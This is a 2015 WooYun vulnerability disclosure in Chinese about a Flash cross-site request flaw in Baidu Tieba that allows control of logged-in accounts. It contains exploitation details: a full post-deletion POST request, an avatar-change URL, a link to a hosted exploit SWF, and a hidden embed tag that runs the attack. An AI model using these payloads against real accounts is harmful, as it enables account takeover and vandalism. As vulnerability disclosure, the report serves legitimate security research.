漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百度贴吧XSS漏洞可控制已登录的贴吧账号(删帖、修改资料等)
相关厂商:百度
提交时间:2015-04-24 10:52
修复时间:2015-06-08 12:58
公开时间:2015-06-08 12:58
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开
简要描述:
flash 反射提权。原理 http://drops.wooyun.org/papers/5732,这次演示的是第3个Demo的方式。
详细说明:
### 原理
问题 SWF:http://tieba.baidu.com/tb/static-itieba3/swf/itiebaVote.swf
其中 baidu.vote.DataManager.requestPageData() 可以发请求。
请求地址没写死,从 baidu.vote.enumerate.Constants.URL_VOTE_DETAIL 读取。(这个程序猿也够弱的,居然是用 var 定义的。如果是 const 那还改不了)
每次请求前修改这个伪常量,就可发起跨站请求。
同时,数据返回时调用了 PostVoteResult.fromString(),其中使用 JSON 解码。之前文中介绍过,即使不是 JSON 格式的数据,也可以通过全局异常捕获,接住解码时的错误,从中获取页面信息。
### 利用
http://tieba.baidu.com/ 可获取登录的账号名。
http://tieba.baidu.com/home/profile?un={nick} 可获取 bdstoken、portrait
删帖:
POST http://tieba.baidu.com/f/commit/post/delete
tbs={页面中可获取}
kw={吧名}
tid={帖子 id}
user_name={nick}
pid={页面中可获取}
delete_my_post=1
delete_my_thread=0
is_vipdel=1
is_finf=false
修改头像
http://himg.baidu.com/sys/corpupload?callback=A&coordX=0&coordY=0&coordW=200&coordH=200&psign={portrait}&picId=21751076141&bdstoken={bdstoken}
...
贴吧大部分接口都没验证 referer,所有都能成功。
由于发帖需要验证码,搞成蠕虫有点麻烦。但控制了吧主账号的话,还是可以通过 HTTP 隧道的方式,人工发帖。(给吧主发个超链接,里面放些有趣的东西,让他多停留一会)
漏洞证明:
这里给个自动修改百度用户头像的 Demo:
http://www.etherdream.com/hack/tieba-joke/exp.swf
直接访问,或嵌套在任意页面:
<embed src="//t.cn/RAY0j61" allowScriptAccess="always" style="position:absolute; top:-999px;">
即可修改已登录的百度账号头像。
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-04-24 12:57
厂商回复:
感谢关注,已提交相关部门处理
最新状态:
暂无
漏洞评价:
评论
-
2015-04-24 10:53 |
浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)
-
2015-04-24 11:05 |
小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)
-
2015-04-24 11:05 |
于小木 ( 路人 | Rank:26 漏洞数:4 )
-
2015-04-24 11:10 |
EtherDream ( 实习白帽子 | Rank:64 漏洞数:11 | JSHacker)
-
2015-04-24 11:51 |
GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)
-
2015-04-24 17:22 |
Friday ( 实习白帽子 | Rank:40 漏洞数:10 | 破土的小竹笋)
-
2015-06-04 17:55 |
昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)
-
2015-06-08 13:07 |
明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)
-
2015-06-08 13:09 |
牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)
-
2015-06-09 07:33 |
小哲哥 ( 路人 | Rank:4 漏洞数:2 | 关注网站安全)
-
2015-06-16 10:27 |
EtherDream ( 实习白帽子 | Rank:64 漏洞数:11 | JSHacker)
居然没修复。。。还是能 CSRF 到用户名和bdstoken。。。
-
2015-06-17 00:26 |
昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)
@EtherDream bdstoken能干啥用啊?求解
-
2015-06-17 22:51 |
liyang ( 路人 | Rank:25 漏洞数:11 | 低调 沉默 守望)